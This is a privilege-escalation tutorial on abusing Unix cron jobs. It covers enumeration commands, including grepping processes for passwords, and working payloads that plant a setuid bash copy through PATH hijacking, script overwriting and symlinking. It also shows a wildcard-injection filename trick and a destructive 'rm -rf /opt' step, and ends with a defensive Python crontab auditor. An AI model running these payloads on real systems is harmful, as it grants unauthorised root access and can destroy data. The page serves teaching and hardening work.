Cron Jobs
Theory
Cron is a job scheduler in Unix-based operating systems. Cron jobs are used to schedule tasks by executing commands at specific dates and times on the server. By default, Cron runs as root when executing /etc/crontab, so any commands or scripts called from that crontab will also run as root. This makes it an interesting privilege escalation path.
Practice
Misc Cron Jobs
You may want to enumerate cron jobs with the following commands:
#Print jobs with Crontab binary
crontab -l
crontab -l -u username
#Directly cat files
cat /etc/cron* /etc/at* /etc/anacrontab /var/spool/cron/crontabs/root 2>/dev/null | grep -v "^#"
#From logs
cat /var/log/syslog | grep "CRON"
#In /etc/ and subfolders
cat /etc/crontab
cat /etc/cron*/*
# In /var/spool
cat /var/spool/cron/*
cat /var/spool/cron/crontabs/*

By using pspy, you can fetch processes without root privileges. It can be useful to detect cron jobs.
# -p: print commands to stdout
# -f: print file system events to stdout
# -i: interval in milliseconds
./pspy64 -pf -i 1000

It is also possible to monitor processes using the watch command. For example, we can grep for all occurrences of the word "pass". We may find clear-text credentials that way.
watch -n 1 "ps -ef | grep pass"

Cron Path
For example, inside /etc/crontab you can find the PATH: PATH=/home/user:/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
We need to check whether we have permission to write to each directory in that PATH; if the binary in the cron job is specified without its full path, we may be able to exploit it.
$ cat /etc/crontab
SHELL=/bin/sh
PATH=/home/user:/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
17 * * * * root path-exploit.sh

We need to check if we have permission to write to each path.
ls -al /usr/local/
ls -al /usr/
ls -al /

Assume we can write an arbitrary file under /home/user, and it is specified in the crontab PATH as in the example. We can create a payload there.
echo 'cp /bin/bash /tmp/bash; chmod +s /tmp/bash' > /home/user/path-exploit.sh
chmod +x /home/user/path-exploit.sh

Then wait for the job to execute.
# Run SUID Shell after exploit
/tmp/bash -p

Wildcard Injection
If a cron job script running as root contains a * (wildcard) inside a command, then you may be able to exploit it.
$ cat /etc/crontab
SHELL=/bin/sh
PATH=/home/user:/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
17 * * * * root rsync -a *.sh rsync://host.back/src/rbd

The exploit will depend on the binary. Using the previous example, we can use the following commands to exploit it.
touch "-e sh myscript.sh"
echo '<PAYLOAD>' > myscript.sh

Read the following page for more wildcard exploitation tricks: HERE
File Overwriting and Symlink
If you can modify a cron job script executed by root, or it uses a directory where you have full access, then we can exploit it.
$ cat /etc/crontab
SHELL=/bin/sh
PATH=/home/user:/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
17 * * * * root /opt/crons/overwrite.sh

If we have write permissions on the script, we can exploit it by overwriting it:
#Check you have permissions
ls -la /opt/crons/overwrite.sh
#Overwrite
echo 'cp /bin/bash /tmp/bash; chmod +s /tmp/bash' > /opt/crons/overwrite.sh
#Wait until it is executed
/tmp/bash -p

If we have full access over the directory, it could be useful to delete that folder and create a symlink to another one serving a script controlled by you.
#Check you have permissions
ls -la /
#Remove folder and create the symlink target
rm -rf /opt
mkdir /tmp/crons
#Create a new script
echo 'cp /bin/bash /tmp/bash; chmod +s /tmp/bash' > /tmp/crons/overwrite.sh
#Create symlink folder
ln -d -s /tmp/crons/ /opt/crons/
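Defenders can audit a system crontab for these weaknesses mechanically. The following Python script is an added example (not from the original page) that flags the three conditions discussed above: a bare command name combined with a writable PATH directory, a wildcard in the command line, and a writable job script or script directory. The sample crontab is constructed from the entries shown on this page, and the writable() check is injectable so the audit runs offline; by default it asks the OS.

```python
import os
import shlex

# Constructed sample reusing the three weak entries shown above (not a real crontab).
SAMPLE_CRONTAB = """\
SHELL=/bin/sh
PATH=/home/user:/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
17 * * * * root path-exploit.sh
17 * * * * root rsync -a *.sh rsync://host.back/src/rbd
17 * * * * root /opt/crons/overwrite.sh
"""

def audit_crontab(text, writable=lambda p: os.access(p, os.W_OK)):
    """Return (entry, issue) pairs for a system crontab (lines with a user field).
    writable(path) is injectable so the audit can run on constructed data;
    the default asks the OS whether the current user can write the path."""
    findings = []
    path_dirs = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        if line.startswith("PATH="):
            path_dirs = line[len("PATH="):].split(":")  # cron resolves bare names here
            continue
        if "=" in line.split()[0]:      # other VAR=value assignment (SHELL, MAILTO, ...)
            continue
        fields = line.split(None, 6)    # min hour dom mon dow user command
        if len(fields) < 7:
            continue
        command = fields[6]
        try:
            prog = shlex.split(command)[0]
        except (ValueError, IndexError):
            continue
        if "/" not in prog:
            # Bare name: every writable PATH directory is a place to plant a lookalike.
            for d in path_dirs:
                if writable(d):
                    findings.append((line, f"bare command name; writable PATH dir {d}"))
        elif writable(prog):
            findings.append((line, "job script is writable"))
        elif writable(os.path.dirname(prog)):
            findings.append((line, "job script directory is writable (symlink risk)"))
        if any(ch in command for ch in "*?["):
            # Shell globs let attacker-named files be parsed as options.
            findings.append((line, "wildcard in command line"))
    return findings
```

Run it against the real file with `audit_crontab(open("/etc/crontab").read())` and fix anything it reports by using absolute paths, a root-owned PATH, and no globs in root jobs.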